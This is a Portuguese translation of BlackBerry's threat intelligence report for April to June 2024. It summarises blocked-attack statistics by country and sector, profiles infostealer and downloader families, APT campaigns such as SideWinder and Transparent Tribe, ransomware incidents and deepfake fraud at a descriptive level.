Inteligência acionável que importa
Este relatório fornece uma análise abrangente do cenário global de ameaças com foco no fornecimento de inteligência acionável que os clientes podem usar para proteger suas organizações de forma proativa. Esse relatório abrange o período de abril a junho de 2024. Os destaques do relatório incluem:
O malware único e os ataques interrompidos (tentativas de ataques bloqueados pelas soluções de segurança cibernéticaBlackBerry®) aumentaram 53% e 18% , respectivamente, em relação ao período do relatório anterior. O site BlackBerry observou uma média de mais de 11.500 hashes de malware únicos sendo capturados diariamente.
Leia Quarterly Attacks (Ataques trimestrais ) para obter mais informações.
Neste trimestre, mais de 800.000 ataques ocorreram contra infraestruturas críticas, sendo que 50% deles foram direcionados ao setor financeiro.
Descubra as descobertas internas e externas da nossa equipe de Inteligência sobre Ameaças Cibernéticas (CTI) na seção Infraestrutura Crítica.
As empresas comerciais foram muito visadas neste ciclo e, dos ataques interrompidos, 66% foram contra empresas que fornecem bens de capital.
Leia mais sobre essas ameaças na seção sobre Empresa Comercial.
A nova seção Law Enforcement Limelight traz um novo aspecto a esses relatórios, com descobertas do Canadian National Cybercrime Coordination Centre (NC3).
Leia mais sobre a epidemia de ransomware que atinge o Canadá.
Muitos grupos criminosos de alto perfil (principalmente grupos de ransomware) foram altamente ativos no período do relatório. Esses grupos usam uma série de ferramentas complexas para atingir seus objetivos.
Leia mais em Threat Actors and Tooling (Agentes de ameaça e ferramentas).
O cenário de ameaças cibernéticas é um turbilhão de grupos que exploram as vulnerabilidades mais recentes e utilizam famílias de malware novas ou atualizadas.
Leia nossa seção Ameaças predominantes para saber mais sobre as tendências de ameaças em todos os principais sistemas operacionais.
Os ladrões de informações mal-intencionados (também conhecidos como infostealers) são uma arma importante utilizada por agentes de ameaças para exfiltrar informações e credenciais valiosas.
Leia nossas observações sobre as ferramentas de exfiltração na seção CylanceMDR™ Observations.
Nossa análise geopolítica considera como o aumento das ameaças cibernéticas sofisticadas ressalta a necessidade de aprimorar a educação sobre segurança cibernética.
Veja como a BlackBerry está investindo em educação cibernética em seu primeiro Centro de Excelência em Segurança Cibernética (CCoE) na Malásia.
Índice
Total de ataques cibernéticos neste período
De abril a junho de 2024, as soluções de segurança cibernética daBlackBerry interromperam 3,7 milhões de ataques cibernéticos. Isso representa mais de 43.500 ataques cibernéticos interrompidos por dia - um aumento de 18% em relação ao nosso período de relatório anterior, que foi de janeiro a março de 2024.
Além disso, observamos uma média de 11.500 amostras exclusivas de malware por dia direcionadas à nossa base de clientes, um aumento de 53% em relação ao último relatório. Esse é um dos maiores aumentos percentuais, trimestre a trimestre, desde que começamos nossos relatórios do Global Threat Intelligence. Embora a alteração de um hash binário ou a geração de cargas úteis exclusivas não seja complexa para agentes de ameaças experientes, o volume excepcionalmente alto de "Ataques interrompidos" e "Hashes exclusivos" é significativo. Isso indica que os desenvolvedores de malware estão atualizando e adaptando rapidamente seu código para aumentar a resiliência. Os números brutos sugerem que novos malwares estão se adaptando, as famílias de malwares existentes estão ganhando recursos e os adversários estão empregando rapidamente táticas mais avançadas. Isso resulta em um malware mais potente por meio de técnicas aprimoradas de ofuscação, sofisticação e evasão.
BlackBerry está monitorando e identificando ativamente as modificações nas famílias de malware à medida que os desenvolvedores criminosos cibernéticos se esforçam para contornar os sistemas de segurança cibernética. Neste relatório, você lerá as últimas descobertas da nossa Equipe de Pesquisa e Inteligência sobre Ameaças, saberá quais grupos estão usando cada tipo de malware no momento e analisará nossas recomendações sobre defesa cibernética estratégica contra esses tipos de ameaças.
Como você perceberá, o número total de ataques não está necessariamente correlacionado com o número de hashes exclusivos (novo malware). Como ilustram as figuras 2 a 9 nas próximas seções, nem todo ataque cibernético usa malware exclusivo. Isso depende da motivação do invasor, da complexidade do ataque e de seu objetivo geral - por exemplo, espionagem, ganho financeiro ou causar danos gerais ao alvo.
(*Este relatório abrange um ciclo de 120 dias. Os outros relatórios são ciclos de aproximadamente 90 dias).
Total de ataques cibernéticos por país
Ataques interrompidos
As organizações que utilizam as soluções BlackBerry nos Estados Unidos receberam o maior número de tentativas de ataques neste ciclo. Fora dos EUA, a Coreia do Sul, o Japão, a Austrália e a Nova Zelândia também sofreram um alto nível de ataques, o que lhes rendeu lugares entre os cinco primeiros e fez da Ásia-Pacífico (APAC) a segunda região mais visada.
Na região da APAC, onde o envolvimento da BlackBerry está aumentando, as tensões geopolíticas continuam a influenciar as tendências cibernéticas. Os ataques cibernéticos patrocinados e não patrocinados pelo Estado à infraestrutura crítica, às cadeias de suprimentos e às empresas estão aumentando. As organizações são cada vez mais visadas por uma infinidade de ameaças, como espionagem cibernética, espionagem, ransomware e ataques de phishing. Para aumentar a resiliência de suas cadeias de suprimentos e organizações, elas devem ter cuidado e aumentar a vigilância para proteger sua infraestrutura, dados, dispositivos e comunicações.
A Figura 2 mostra os cinco principais países nos quais as soluções de segurança cibernética da BlackBerry impediram a maioria dos ataques cibernéticos e que receberam a maioria dos binários maliciosos.
Malware exclusivo
Conforme observado na seção Total de ataques cibernéticos neste período, o BlackBerry observou uma média de 11.500 novos hashes (malware exclusivo) por dia direcionados à nossa base de clientes, um aumento de 53% em relação ao relatório anterior. Esse é um dos maiores aumentos percentuais de um trimestre a outro que observamos desde que começamos nossos relatórios recorrentes. Muitos fatores contribuem para esse aumento de malware exclusivo. Um deles é o aumento de ataques direcionados em um nível macro, como o direcionamento de uma lista de e-mails de funcionários inteira com e-mails de phishing direcionados e iscas específicas da empresa, com a esperança de que vários funcionários sejam enganados.
Como mostra a Figura 2, os Estados Unidos, o Japão, a Coreia do Sul e a Austrália ainda estão no topo da lista, como no relatório do período anterior. Como mostra a Figura 2, os EUA, o Japão, a Coreia do Sul e a Austrália ainda estão no topo da lista, como estavam no relatório do período anterior. Além disso, o Canadá é agora o quinto maior destinatário de malware exclusivo.
Comparação de resultados
Destaque da história cibernética: Espionagem na APAC
A Transparent Tribe tem como alvo os setores governamental, de defesa e aeroespacial da Índia, utilizando linguagens de programação multiplataforma
Em seus últimos esforços, os pesquisadores do BlackBerry identificaram o Transparent Tribe, um grupo paquistanês de ameaças persistentes avançadas (APT), que tem como alvo os setores governamental, de defesa e aeroespacial da Índia. Conhecido por realizar espionagem cibernética desde 2013, o grupo usa linguagens de plataforma cruzada, como Python e Golang, e abusa de serviços da Web, como Telegram e Discord. Campanhas recentes incluíram e-mails de spearphishing direcionados às principais partes interessadas do setor aeroespacial em Bengaluru (antiga Bangalore), na Índia. Apesar das tentativas de ocultar suas origens, as táticas e ferramentas da Transparent Tribe apontavam para elas.
Ataques cibernéticos por setor
BlackBerry consolidou seus setores industriais em duas categorias principais: infraestrutura crítica e empresas comerciais. BlackBerryA telemetria e as estatísticas de infraestrutura crítica da CISA vêm de seus clientes nos 16 setores definidos pela Cybersecurity and Infrastructure Security Agency (CISA) como infraestrutura crítica. Esses setores incluem saúde, governo, energia, agricultura, finanças e defesa. As entidades comerciais dentro das empresas comerciais se envolvem na produção, distribuição ou venda de bens e serviços. Essas empresas operam em vários setores, como manufatura, varejo e serviços.
Infraestrutura crítica
A infraestrutura crítica é um alvo lucrativo para os criminosos cibernéticos. Esses dados geralmente são altamente valiosos e podem ser revendidos a outros grupos de ameaças, usados para planejar ataques ou até mesmo para espionagem. Os agentes de ameaças que visam a infraestrutura essencial podem recorrer ao uso de ransomware em seus ataques porque a organização pode preferir pagar o resgate em vez de perder tempo tentando restaurar a partir de backups. O tempo é essencial para as organizações que prestam serviços essenciais, como o setor de saúde, e os agentes de ameaças sabem muito bem disso.
Este ano, a turbulência geopolítica colocou a infraestrutura essencial na mira de adversários que se opõem às políticas das nações em que residem ou com as quais colaboram. Isso frequentemente estimula grupos de ameaças e patrocinadores estatais a visar especificamente a infraestrutura essencial.
A crescente digitalização da infraestrutura essencial tornou o setor ainda mais vulnerável aos criminosos cibernéticos nos últimos anos. Os agentes de ameaças exploram ativamente os sistemas essenciais atacando vulnerabilidades, como configurações incorretas do sistema e sistemas legados não corrigidos, ou tentando se infiltrar nos sistemas por meio de campanhas de engenharia social conduzidas contra funcionários.
No período de abril a junho de 2024, CylanceENDPOINT™ e outras soluções de segurança cibernética da BlackBerry interromperam mais de 800.000 ataques contra organizações nos setores industriais de infraestrutura crítica. Quase metade desses ataques foi contra empresas do setor financeiro - um aumento de 10% em relação ao período anterior - enquanto as organizações do governo e do setor público sofreram a maior diversidade de ataques, atraindo mais de 45% dos hashes exclusivos.
Além disso, quase metade (49%) dos hashes de malware exclusivos visavam organizações de infraestrutura crítica, um aumento de 17% em relação ao período anterior, enquanto 41% dos ataques cibernéticos específicos do setor encontrados pelas soluções de segurança cibernética do BlackBerry eram contra infraestrutura crítica.
-
Infraestrutura crítica: Ameaças internas
As ameaças internas são as ameaças que o site BlackBerry identifica e contra as quais se protege em sua própria base de clientes. As ameaças externas (abordadas na próxima seção) são aquelas relatadas por terceiros, como publicações de notícias do setor, fornecedores de segurança ou agências governamentais.
-
Vidar
Tipo: Infostealer
Objetivos: Telecomunicações, saúde
Regiões: América Latina (LATAM), América do Norte
O Vidar é um infostealer que existe desde 2018. Provavelmente o desdobramento do outrora famoso infostealer Arkei, o Vidar permaneceu extremamente ativo e é frequentemente vendido por meio de malware como serviço (MaaS) em fóruns clandestinos. O malware é altamente flexível e pode ser colocado no dispositivo da vítima de várias maneiras, como por meio de documentos de phishing, malvertising (publicidade que espalha malware) e distribuição secundária por meio de outros malwares. No início de 2024, observamos que o Vidar também foi usado para atacar infraestruturas críticas. Durante o período deste relatório, observamos que o Vidar atacou principalmente os setores de telecomunicações e saúde, especialmente nos países da América Latina, e também foi observado atacando o setor de saúde na América do Norte.
-
Carregador de fumaça
Tipo: Downloader
Objetivos: Alimentos e agricultura, saúde
Regiões: LATAM, América do Norte
Operacional desde 2011, o SmokeLoader é um importante mecanismo de entrega de cargas maliciosas de segundo estágio, incluindo uma variedade de cavalos de Troia, infostealers e até mesmo ransomware. O SmokeLoader, que é vendido como MaaS, também pode coletar credenciais de usuário. Ele é popular entre vários grupos de ameaças de alto perfil devido à sua capacidade de implantar malware adicional. Em maio de 2024, a Europol coordenou a Operação Endgame para atacar os downloaders mal-intencionados. Mais de 100 servidores de malware foram derrubados ou interrompidos e mais de 2.000 domínios foram apreendidos pelas autoridades policiais. Embora essas ações tenham prejudicado gravemente as operações dos grupos de ameaças por trás do SmokeLoader, binários relacionados ao malware ainda foram observados neste trimestre no setor de saúde da América do Norte e no setor de alimentos e agricultura na América Latina.
-
RisePro
Tipo: Infostealer
Objetivos: Telecomunicações, alimentos e agricultura, saúde
Regiões: LATAM, América do Norte
O RisePro é um infostealer multifuncional frequentemente vendido como MaaS em fóruns clandestinos. O RisePro foi observado inicialmente no final de 2022. Depois, no final de 2023 e início de 2024, o site BlackBerry notou um aumento acentuado da atividade do RisePro.
O infostealer RisePro pode ser colocado no dispositivo da vítima de várias maneiras, frequentemente por meio de links maliciosos ou anexos de e-mail. Ele também foi implantado por meio do PrivateLoader, um malware pay-per-install (PPI) frequentemente usado como um serviço de distribuição de malware.
Uma vez no dispositivo da vítima, o RisePro se comunica com seu servidor de comando e controle (C2), onde recebe comandos para roubar dados, instalar malware adicional e exfiltrar informações do dispositivo. Neste trimestre, o RisePro foi observado tendo como alvo empresas de alimentos, agricultura e telecomunicações em países da América Latina e serviços de saúde na América do Norte.
-
GuLoader
Tipo: Downloader
Objetivos: Educação, transporte, saúde, alimentação e agricultura
Regiões: APAC, América do Norte
O GuLoader (também conhecido como CloudEyE) é um importante downloader que distribui outros malwares. Desde 2020, o grupo de ameaças por trás do GuLoader adicionou técnicas de antianálise para dificultar que os serviços de segurança identifiquem seus ataques ou criem contramedidas. O GuLoader geralmente funciona em conjunto com outros malwares, como infostealers como FormBook, Agent Tesla e Remcos.
Durante esse ciclo de relatórios, o GuLoader pareceu ter como alvo principalmente organizações norte-americanas nos setores de transporte, alimentos e agricultura e educação. No entanto, os binários do GuLoader também foram encontrados em empresas de transporte nos países da APAC.
-
Lumma Stealer
Tipo: Infostealer
Metas: Alimentos e agricultura, energia, finanças
Regiões: APAC, LATAM, América do Norte
O Lumma Stealer (também conhecido como LummaC2) é um infostealer baseado em C que, pelo segundo período consecutivo, tem como alvo empresas de alimentos e agricultura na América Latina e o setor de energia na Ásia-Pacífico. O Lumma Stealer é um MaaS especializado na exfiltração de dados confidenciais, como credenciais de login e detalhes bancários, para cometer fraudes bancárias. Além disso, o Lumma Stealer teve como alvo empresas de serviços financeiros na América do Norte e na APAC.
Destaque da história cibernética: Ameaças contra infraestruturas críticas
SideWinder utiliza nova infraestrutura de distribuição para atingir portos e instalações marítimas no Mar Mediterrâneo
Em julho de 2024, a Equipe de Pesquisa e Inteligência sobre Ameaças do site BlackBerry descobriu uma nova campanha do grupo de ameaças conhecido como SideWinder. Também conhecido como Razor Tiger, Rattlesnake e T-APT-04, o grupo SideWinder está ativo desde pelo menos 2012. O grupo foi observado anteriormente visando entidades militares, governamentais e comerciais, com foco especial no Paquistão, Afeganistão, China e Nepal. O SideWinder normalmente usa técnicas de spearphishing de e-mail, exploração de documentos e carregamento lateral de DLL para evitar a detecção e fornecer implantes direcionados.
Nessa campanha, o site BlackBerry observou três documentos falsificados do tipo "isca visual" associados a uma infraestrutura portuária muito específica. As iscas visuais normalmente não são maliciosas em si; seu objetivo principal é distrair a vítima para que ela não perceba que está sendo comprometida. A vítima geralmente é um funcionário de uma empresa-alvo. Veja abaixo um exemplo da última campanha da SideWinder:
Os agentes de ameaças usam uma variedade de truques para tentar a vítima a abrir e ler o documento de isca visual:
- O invasor copia o logotipo real de uma organização legítima com a qual o destinatário provavelmente está familiarizado devido ao seu trabalho ou setor. Na Figura 7 acima, o documento de isca visual abusa do logotipo da Autoridade Portuária do Mar Vermelho (legítima) no Egito.
- Os títulos de documentos são projetados para causar o máximo de ansiedade no destinatário. O título em nosso exemplo acima ("AVISO DE RESCISÃO DE EMPREGADO E CORTE SALARIAL") tem o objetivo de fazer com que o empregado tema pela segurança de seu emprego e de suas finanças.
- No exemplo acima, observe frases carregadas de emoção, como "esgotou a maior parte de nossas reservas financeiras", "séria preocupação" e "rescindir o contrato de trabalho" no corpo do documento. Essas frases estão formatadas em negrito para que se destaquem imediatamente para o leitor.
Os agentes da ameaça esperam que, usando logotipos de empresas conhecidas e provocando fortes emoções, como medo ou preocupação com a segurança do emprego, a vítima acredite que o documento é legítimo e seja obrigada a lê-lo em um estado de alta ansiedade. Ela ficará tão distraída que não perceberá eventos estranhos no dispositivo, como pop-ups do sistema ou aumento do ruído do ventilador causado pela alta utilização da CPU, o que geralmente é um sinal de alerta precoce de uma infecção por malware em andamento.
Ao analisar os dados descobertos durante nossa pesquisa, concluímos com confiança média que a nova campanha da SideWinder tem como alvo portos e instalações marítimas no Oceano Índico e no Mar Mediterrâneo. Com base nas campanhas anteriores da SideWinder, acreditamos que o objetivo dessa nova campanha é a espionagem e a coleta de informações. Leia a história completa no blogBlackBerry .
Infraestrutura crítica: Ameaças externas
BlackBerry também acompanha de perto as ameaças externas, ou seja, as ameaças relatadas por organizações externas e não necessariamente encontradas nos próprios locatários do site BlackBerry. Durante esse período, grupos externos - agências governamentais, organizações de notícias do setor e outros - relataram vários ataques em todo o mundo contra infraestruturas críticas.
Nos últimos dias de março, foi divulgada a notícia de que várias agências do governo indiano e entidades do setor de energia foram infectadas com uma variante personalizada do sequestrador de informações disponível gratuitamente, o HackBrowserData. Utilizando e-mails de phishing como vetor de infecção e canais do Slack como canal de exfiltração, o agente de ameaças desconhecido roubou 8,8 GB de dados confidenciais, incluindo detalhes de funcionários e registros financeiros.
Em abril, a Frontier Communications, uma empresa de telecomunicações com sede no Texas, informou à Comissão de Valores Mobiliários dos EUA (SEC) que havia detectado uma violação em 14 de abril e que precisou desligar alguns de seus sistemas para se recuperar. O agente de ameaça desconhecido conseguiu acessar dados confidenciais, incluindo informações de identificação pessoal.
Também em abril, a Equipe de Resposta a Emergências de Computadores da Ucrânia (CERT-UA) relatou um plano do grupo Sandworm, supostamente patrocinado pela Rússia, para atacar várias entidades de infraestrutura crítica no país devastado pela guerra. O plano visava cerca de 20 entidades em vários setores de infraestrutura crítica, incluindo água e energia. O longo histórico de ataques do Sandworm à infraestrutura essencial da Ucrânia provavelmente persistirá à medida que a guerra entre a Rússia e a Ucrânia continuar.
A primeira semana de maio trouxe um aviso conjunto de várias agências dos EUA, em colaboração com o Centro Nacional de Segurança Cibernética do Reino Unido e o Centro de Segurança Cibernética do Canadá (CCCS), sobre uma ameaça hacktivista contínua de elementos pró-russos. Os hacktivistas tinham como alvo a infraestrutura essencial conectada à Internet, incluindo água, energia, represas e agricultura. Seus esforços se concentraram em sistemas de tecnologia operacional (OT) voltados para a Internet em setores de infraestrutura crítica na Europa e na América do Norte.
No início de maio, os operadores do ransomware BlackBasta atacaram um grande provedor de serviços de saúde católico sem fins lucrativos, com cerca de 140 hospitais em 18 estados dos EUA. O ataque interrompeu os serviços em toda a rede do provedor de serviços de saúde por várias semanas. Em seguida, no início de junho, o BlackBasta roubou 550 GB de dados da empresa de biotecnologia Elutia, sediada em Maryland. Os dados incluíam informações financeiras e de funcionários.
O BlackBasta não foi a única gangue de ransomware a atacar o setor de saúde. No final de junho, o grupo de ransomware BlackSuit violou o Serviço Nacional de Laboratórios de Saúde da África do Sul (NHLS) e seus 265 laboratórios. Acredita-se que o BlackSuit seja um derivado da agressiva e perigosa gangue de ransomware Conti. A violação do BlackSuit coincidiu com um surto de monkeypox (mpox) e afetou significativamente os sistemas do NHLS. O agente da ameaça excluiu partes dos sistemas do NHLS, incluindo backups, embora não tenha sido relatada a perda de dados confidenciais de pacientes.
Esses ataques e outros ao longo do último trimestre indicam que os operadores de ransomware que têm como alvo infraestruturas essenciais, especialmente o setor de saúde, continuam sendo um problema persistente.
Empresa comercial
As ameaças internas contra empresas comerciais também aumentaram significativamente durante o período do relatório. O número de ataques interrompidos pela segurança cibernética do BlackBerry (1,1 milhão de ataques) aumentou 60% em comparação com o último relatório.
No setor de empresas comerciais, observamos um aumento significativo nos ataques contra o setor de bens de capital. Diferentemente dos bens de consumo, os bens de capital incluem máquinas, ferramentas e equipamentos essenciais para vários setores em toda empresa comercial e infraestrutura crítica. O direcionamento desses ativos pode afetar as cadeias de suprimentos digitais e físicas de uma empresa.
-
Empresa comercial: ameaças internas
As ameaças internas são as ameaças que o site BlackBerry identifica e contra as quais se protege em sua própria base de clientes. As ameaças externas (abordadas na próxima seção) são aquelas relatadas por terceiros, como publicações de notícias do setor, fornecedores de segurança ou agências governamentais.
-
Amadey
Tipo: Bot/Infostealer
Objetivos: Manufatura, serviços comerciais, bens de capital
Regiões: Europa, Oriente Médio e África (EMEA), APAC, LATAM
Aparecendo pela primeira vez em 2018, o Amadey é um malware modular ainda ativo no cenário de ameaças. Por meio de mudanças iterativas, ele se manteve relevante com os recentes avanços em suas comunicações. O Amadey pode reunir inteligência e sondar as máquinas das vítimas antes de exfiltrar dados para seu C2. Ele é frequentemente usado como uma rede de bots para espalhar outros malwares em massa e, com frequência, facilita a implantação de infostealers e criptomineradores mal-intencionados.
Durante o período do relatório, a Amadey visou serviços comerciais e de manufatura nas regiões EMEA, APAC e LATAM, bem como serviços de bens de capital especificamente nos países da LATAM.
-
Carregador privado
Tipo: Downloader
Objetivos: Manufatura, serviços comerciais
Regiões: APAC, LATAM, América do Norte
O PrivateLoader é um facilitador generalizado de malware que opera como um serviço de pagamento por instalação para distribuição de malware. Geralmente distribuído por meio de sites falsos que hospedam software "crackeado", o PrivateLoader pode fazer o download de uma variedade de cargas maliciosas, incluindo uma ampla gama de infostealers como o RisePro. O PrivateLoader usa uma técnica conhecida como envenenamento de SEO para aumentar a proeminência de seus sites falsos. A técnica engana os usuários, fazendo-os supor que os principais resultados de pesquisa são os mais confiáveis e é muito eficaz quando as pessoas não olham atentamente para os resultados de pesquisa. Durante o período do relatório, o PrivateLoader teve como alvo a manufatura na América do Norte e os serviços comerciais na América Latina e na Ásia-Pacífico.
-
Agente Tesla
Tipo: Trojan de acesso remoto
Objetivos: Manufatura, varejo de alimentos, serviços comerciais
Regiões: APAC, LATAM, América do Norte
O Agent Tesla é um proeminente trojan de acesso remoto (RAT) especializado em roubo de informações que tem visado ativamente os usuários de sistemas baseados no sistema operacional Microsoft Windows desde 2014. Vendido por meio de fóruns clandestinos e promovido como uma oferta de MaaS, esse malware comercial é conhecido por roubar dados e credenciais confidenciais, gravar pressionamentos de teclas e capturar imagens das telas das vítimas. Ele é frequentemente utilizado em campanhas de phishing e hospedado/distribuído como software crackeado trojanizado.
Vários setores foram alvo da Agent Tesla nesse ciclo, incluindo manufatura, varejo de alimentos e serviços comerciais em países da APAC, LATAM e América do Norte.
-
FormBook
Tipo: Infostealer
Objetivos: Varejo de alimentos
Regiões: APAC
O FormBook e sua evolução, o XLoader, são famílias de malware sofisticadas que operam como ladrões de informações complexos e downloaders versáteis para malware adicional. Desde a sua criação, essas famílias de malware têm sido resistentes e estão em constante evolução para evitar e contornar as defesas cibernéticas por meio de técnicas anti-VM, injeção de processos e rotinas de criptografia personalizadas.
Geralmente vendido como MaaS, o XLoader pode roubar dados de navegadores, clientes de e-mail e uma série de outros aplicativos. Vários incidentes cibernéticos relacionados ao XLoader tiveram como alvo varejistas de alimentos nos países da APAC neste trimestre.
-
GuLoader
Tipo: Downloader
Objetivos: Serviços comerciais, varejo de alimentos, manufatura
Regiões: APAC, EMEA, América do Norte
O GuLoader, também conhecido como CloudEyE, é um importante downloader usado em vários ataques como mecanismo de entrega para outros malwares. Ativo no site desde 2020, ele passou por mudanças iterativas, tornando-se mais sofisticado e integrando técnicas adicionais de antianálise. O GuLoader geralmente funciona com outros malwares, como infostealers como FormBook, Agent Tesla e Remcos.
Neste trimestre, o GuLoader teve como alvo a manufatura na América do Norte, os varejistas de alimentos na APAC e os serviços comerciais na EMEA e na APAC.
-
RisePro
Tipo: Infostealer
Objetivos: Serviços comerciais, bens de capital
Regiões: APAC
O RisePro é um infostealer multifuncional frequentemente vendido como MaaS em fóruns clandestinos. O RisePro foi observado inicialmente no final de 2022. Depois, no final de 2023 e início de 2024,o site BlackBerry notou um aumento acentuado da atividade do RisePro. O RisePro pode ser colocado no dispositivo da vítima de várias maneiras, geralmente por meio de links maliciosos ou anexos de e-mail. Ele também foi implantado via PrivateLoader, um malware PPI frequentemente usado como serviço de distribuição de malware. Uma vez em um dispositivo, o RisePro se comunica com seu servidor C2, onde recebe comandos para roubar dados, instalar malware adicional ou extrair informações do dispositivo da vítima.
-
Vidar
Tipo: Infostealer
Objetivos: Manufatura, varejo de alimentos, serviços comerciais, bens de capital
Regiões: APAC, EMEA, LATAM
Vidar é um infostealer que existe desde 2018 e pode ser o desdobramento do infostealer conhecido como Arkei. O Vidar tem sido extremamente ativo e é frequentemente vendido como MaaS em fóruns clandestinos. O malware é altamente flexível e pode ser colocado em um dispositivo da vítima de várias maneiras, como por meio de documentos de phishing, malvertising (publicidade que espalha malware) e distribuição secundária por meio de outro malware. Durante o período do relatório, o Vidar teve como alvo uma série de setores de empresas comerciais, incluindo manufatura na EMEA, varejo de alimentos na APAC, bens de capital na América Latina e serviços comerciais na América Latina e na APAC.
Empresa comercial: Ameaças externas
No início de abril, a IxMetro PowerHost sofreu um ataque cibernético da relativamente nova gangue de ransomware SEXi, supostamente usando o código-fonte vazado do LockBit 3.0. O grupo teve como alvo os servidores VMware ESXi e os backups da organização, causando uma interrupção significativa nos serviços da IxMetro PowerHost no Chile.
Também em abril, a plataforma de compras chinesa Pandabuy foi violada e os dados de mais de 1,3 milhão de clientes foram vazados on-line. A Pandabuy permite que os usuários comprem produtos de outras plataformas de comércio eletrônico chinesas. Um agente de ameaças conhecido como Sanggiero assumiu a responsabilidade pelo ataque, afirmando que explorou vulnerabilidades críticas de servidor na API da plataforma e outras explorações para obter acesso aos serviços internos do varejista. Suspeita-se que o varejista de comércio eletrônico tenha inicialmente pago uma exigência para evitar o vazamento de dados. No entanto, em junho de 2024, o mesmo agente de ameaças alegou ter explorado e extorquido a plataforma baseada na China novamente.
No início de maio, uma grande empresa multinacional de tecnologia alertou os clientes sobre uma violação de dados em grande escala que afetou quase 50 milhões de pessoas. Embora a empresa de tecnologia tenha confirmado que nenhuma informação financeira foi comprometida, outras informações de identificação pessoal (PII) foram expostas, incluindo nomes de clientes e endereços físicos. Apesar disso, a empresa de tecnologia minimizou publicamente o possível impacto da violação devido à natureza não financeira dos dados roubados.
Uma das maiores violações de dados deste ano até agora ocorreu em maio, quando o grupo de ameaças ShinyHunters violou uma empresa multinacional de venda e distribuição de ingressos de entretenimento e roubou os dados de mais de 560 milhões de clientes. Os dados incluíam informações de identificação pessoal, como nomes, endereços e e-mails, além de detalhes de cartões de crédito com hash. Desde então, os usuários afetados foram notificados por e-mail.
Em junho, uma empresa multinacional americana de software sofreu uma grande interrupção devido a um ataque de ransomware, afetando as operações de milhares de concessionárias de automóveis na América do Norte. A interrupção afetou todas as facetas das atividades das concessionárias, incluindo vendas e reparos de carros, em mais de 15.000 locais. O grupo de ransomware BlackSuit assumiu a responsabilidade pelo ataque, exigindo quase US$ 25 milhões em criptomoedas como resgate. Alega-se que a organização pagou o resgate para restaurar seus sistemas.
No final de junho, a TeamViewer, empresa norte-americana de serviços de software, confirmou que o prolífico grupo APT Cozy Bear (também conhecido como APT29) atacou seus sistemas corporativos de TI. O Cozy Bear é um grupo de hackers baseado na Rússia, supostamente afiliado ao Serviço de Inteligência Estrangeira da Rússia. O grupo cometeu vários ataques e explorações ao longo dos anos, incluindo a violação da SolarWinds em 2020. A TeamViewer divulgou uma declaração afirmando que apenas os dados das contas dos funcionários foram comprometidos e que não encontrou evidências de que o Cozy Bear tenha acessado ambientes de produção ou dados de clientes.
Destaque da história cibernética: Deepfakes contra empresas comerciais
Vigilância dos funcionários: A primeira linha de defesa contra golpes de Deepfake
Fotos, vídeos e áudio "deepfake" estão se tornando um problema cada vez maior na segurança cibernética. Deepfakes são mídias manipuladas digitalmente criadas usando inteligência artificial (IA) generativa, sendo que o caso de uso mais comum é uma "troca de rosto", ou seja, a sobreposição digital do rosto de uma pessoa em outro. A mídia deepfake costuma ser altamente realista e convincente e pode ser usada como arma pelos malfeitores em uma ampla gama de ataques, incluindo golpes de phishing, chamadas telefônicas falsas e até mesmo chamadas de vídeo falsas destinadas a fazer com que o destinatário pense que está recebendo uma solicitação legítima de outro funcionário, como seu chefe.
Desde que o primeiro aplicativo para a criação de deepfakes foi lançado por um usuário do Reddit no final de 2017, os deepfakes evoluíram a uma velocidade relâmpago para se tornarem assustadoramente eficazes para enganar os funcionários e fazê-los fornecer aos invasores credenciais de login, registros financeiros ou de clientes e até mesmo transferir milhões de dólares de fundos da empresa para um golpista.
Em um incidente recente, a fabricante de automóveis Ferrari escapou de um dispendioso golpe de deepfake. Um executivo recebeu uma ligação suspeita de alguém que fingia ser o CEO, Benedetto Vigna. O sotaque e o tom do golpista eram quase idênticos aos do verdadeiro CEO, mas o executivo percebeu sinais de alerta, como o uso de um número de telefone desconhecido e a suposta urgência das mensagens.
Para verificar a identidade do autor da chamada, o executivo fez uma pergunta específica sobre uma recomendação de livro - um detalhe que somente o verdadeiro CEO saberia. Quando o golpista não conseguiu responder, eles desligaram. O raciocínio rápido do executivo evitou um possível desastre e fez com que a Ferrari iniciasse uma investigação interna para garantir a segurança de suas comunicações.
Esse incidente destaca o importante papel que os funcionários desempenham na proteção de suas empresas contra fraudes. Um componente essencial de quase todos os ataques de deepfake é a engenharia social; o agente da ameaça presume que o funcionário é o elo mais fraco no perímetro de segurança de uma empresa e usa técnicas de manipulação psicológica para ganhar a confiança de seu alvo. Parabéns aos funcionários que permanecem vigilantes e céticos em relação a solicitações incomuns, especialmente aquelas que envolvem a transferência de dinheiro ou informações confidenciais. Sua conscientização e ação rápida podem salvar uma empresa de perdas financeiras significativas e danos à reputação.
As empresas podem melhorar sua segurança instruindo os funcionários sobre os sinais de alerta que indicam que um golpista pode estar por trás de uma chamada telefônica/vídeo, e-mail ou texto "falso". Você pode começar comemorando e apoiando esses heróis desconhecidos que protegem sua organização contra ameaças sofisticadas todos os dias. Compartilhe essa anedota com seus colegas e colegas de trabalho. Lembre-os de que, se suspeitarem que algo não está certo, confiem em seus instintos e encontrem uma maneira secundária de verificar a identidade do solicitante.
Para saber mais sobre deepfakes, leia nosso white paper, Deepfakes Unmasked: A tecnologia e as técnicas por trás dessa ameaça crescente.
Análise geopolítica e comentários
Os governos de todo o mundo estão cada vez mais conscientes do fato de que a tecnologia é uma força motriz da rivalidade geopolítica. Em seu discurso na Conferência da RSA em São Francisco, Califórnia, em 6 de maio de 2024, o Secretário de Estado dos EUA, Antony J. Blinken, descreveu um mundo às portas de uma competição de soma zero, na qual os países seriam forçados a adotar conjuntos de tecnologias ocidentais ou chinesas. O embaixador do secretário Blinken para o ciberespaço e a política digital, Nathaniel C. Fick, foi ainda mais incisivo ao declarar que "a ordem internacional será definida pelo sistema operacional metafórico que dominar".
O ritmo sem precedentes no qual tecnologias como a IA generativa estão se movendo levou a uma fonte de atividade que pede o uso "responsável" de tecnologias digitais avançadas. Embora tecnologias como a IA tenham um potencial significativo para impulsionar o crescimento econômico, transformar sociedades e enfrentar alguns dos problemas mais difíceis do mundo (por exemplo, mudanças climáticas, desigualdade e doenças), elas também apresentam riscos que podem ser de alto impacto, principalmente se esses riscos se manifestarem em infraestruturas ou serviços essenciais dos quais as pessoas dependem todos os dias.
